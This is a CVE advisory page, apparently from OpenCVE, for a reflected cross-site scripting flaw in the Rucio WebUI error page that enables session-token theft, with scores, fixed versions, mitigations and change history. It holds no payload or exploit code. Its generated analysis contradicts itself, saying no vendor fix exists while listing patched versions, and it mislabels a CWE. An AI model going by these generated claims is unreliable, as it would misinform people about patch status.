Description
Rucio is a software framework that provides functionality to organize, manage, and access large volumes of scientific data using customizable policies. A reflected Cross-site Scripting vulnerability was located in versions prior to 35.8.3, 38.5.4, and 39.3.1 in the rendering of the ExceptionMessage of the WebUI 500 error which could allow attackers to steal login session tokens of users who navigate to a specially crafted URL. Versions 35.8.3, 38.5.4, and 39.3.1 fix the issue.
Published: 2026-02-25
Score: 8.1 High
EPSS: < 1% Very Low
KEV: No
Impact: Cross‑site scripting enabling theft of session tokens
Action: Patch Now
AI Analysis

Impact

Rucio exhibits a reflected XSS flaw in the rendering of the ExceptionMessage on 500 error pages. By causing a specific exception and delivering a maliciously crafted URL, an attacker can inject script that runs in the victim’s browser and reads the login session cookie. This vulnerability is a classic reflected input problem (CWE‑1004) and a classic reflected XSS (CWE‑79), allowing an attacker to hijack a user’s authenticated session and gain unauthorized access to data.

Affected Systems

The issue impacts the Rucio framework produced by CERN, the software that manages large scientific datasets. Versions that are older than 35.8.3, 38.5.4, and 39.3.1 contain the flaw and are therefore vulnerable. The affected releases are used in large research collaborations that rely on Rucio for data access.

Risk and Exploitability

The CVSS v3.1 base score of 8.1 indicates high severity. EPSS indicates a very low exploitation probability (<1%), and it is not listed in the CISA KEV catalog. The attack requires remote access to the WebUI via a crafted URL and depends on the victim having an authenticated session; the craft is delivered through HTTP GET or POST. With these prerequisites, an attacker could exfiltrate session tokens and impersonate the user, compromising both confidentiality and integrity of sensitive scientific data.

Generated by OpenCVE AI on April 17, 2026 at 14:59 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade Rucio to version 35.8.3 or newer (including 38.5.4 and 39.3.1) and restart the service
  • Disable detailed error messages in the WebUI so that exception content is not displayed to the user
  • Apply defensive HTML escaping to all user‑controlled data before rendering within the UI

Generated by OpenCVE AI on April 17, 2026 at 14:59 UTC.

Tracking

Sign in to view the affected projects.

Advisories
Source ID Title
Github GHSA Github GHSA GHSA-h79m-5jjm-jm4q Rucio WebUI has a Reflected Cross-site Scripting Vulnerability
History

Sat, 28 Feb 2026 05:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'poc', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Fri, 27 Feb 2026 15:45:00 +0000

Type Values Removed Values Added
First Time appeared Cern
Cern rucio
CPEs cpe:2.3:a:cern:rucio:*:*:*:*:*:*:*:*
Vendors & Products Cern
Cern rucio

Thu, 26 Feb 2026 13:30:00 +0000

Type Values Removed Values Added
First Time appeared Rucio
Rucio rucio
Vendors & Products Rucio
Rucio rucio

Wed, 25 Feb 2026 19:45:00 +0000

Type Values Removed Values Added
Description Rucio is a software framework that provides functionality to organize, manage, and access large volumes of scientific data using customizable policies. A reflected Cross-site Scripting vulnerability was located in versions prior to 35.8.3, 38.5.4, and 39.3.1 in the rendering of the ExceptionMessage of the WebUI 500 error which could allow attackers to steal login session tokens of users who navigate to a specially crafted URL. Versions 35.8.3, 38.5.4, and 39.3.1 fix the issue.
Title Rucio WebUI has a Reflected Cross-site Scripting Vulnerability
Weaknesses CWE-1004
CWE-79
References
Metrics cvssV3_1

{'score': 8.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N'}

Subscriptions

Cern Rucio
Rucio Rucio
cve-icon MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-02-26T20:44:57.174Z

Reserved: 2026-01-29T14:03:42.540Z

Link: CVE-2026-25136

cve-icon Vulnrichment

Updated: 2026-02-26T20:44:49.572Z

cve-icon NVD

Status : Analyzed

Published: 2026-02-25T20:23:47.273

Modified: 2026-02-27T15:43:26.510

Link: CVE-2026-25136

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-17T15:00:11Z

Weaknesses